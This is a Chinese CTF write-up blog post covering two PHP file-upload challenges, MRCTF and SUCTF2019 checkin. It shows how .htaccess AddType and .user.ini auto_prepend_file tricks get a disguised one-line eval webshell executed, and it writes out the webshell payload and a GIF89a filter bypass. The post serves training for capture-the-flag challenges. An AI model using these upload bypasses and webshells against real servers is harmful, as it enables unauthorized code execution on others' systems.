MRCTF 你传你🐎呢

利用.htaccess文件进行文件上传,按理说是很简单的题,但当时太傻逼,看页面认为是ngnix,就没往这块想.

打开页面随便传张图,burp抓包,修改文件名为”.htaccess”,文件内容为:AddType application/x-httpd-php .png意即将png文件当作php文件来解析,上传.再开一个repeater模块窗口,文件名改为xxx.png, 内容为一句话木马,上传.蚁剑连接,flag在根目录.

关于htaccess文件:htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能(该段内容来自ctfhub.)

SUCTF2019 checkin

这题用到的是.user.ini文件.

传的时候各种检测还挺多的,后缀php,php1,phtml等等都不行,内容中不能有”<?”,必须为图片类型,使用了exif_imagetype来检测.

将后缀改为jpg,加上GIF89a,一句话改为<script language="php">@eval($_POST['pass']);</script>之后,可以上传,但是如何将其作为php来解析就成了问题.如果是apache的话可以上传.htaccess文件达成目的,但本题不是apache,于是就要用到.user.ini文件了.

要利用.user.ini文件需要几个条件,1 服务器脚本语言为php.2 服务器使用CGI/FastCGI模式.3 上传目录下有可执行的php文件.而本题的目录下有index.php,可以联想到,本题考点应该就是.user.ini文件.

.user.ini文件:.user.ini 文件

.user.ini文件构成的PHP后门 – phith0n

文中提到了auto_prepend_file和auto_append_file这两个配置项及其作用,本题选择利用auto_prepend_file.

随意上传图片,burp抓包,文件名改为.user.ini,内容为 GIF89a auto_prepend_file=xxx.jpg,上传,此处的xxx.jpg是你之前上传的图片马的文件名.

之后蚁剑连接上传目录下的index.php,获得flag.(由于user_ini.cache_ttl设置,所以需要稍微等一会儿才能成功连上.)

Categories:

No responses yet

发表评论

电子邮件地址不会被公开。 必填项已用*标注

闽ICP备19027300号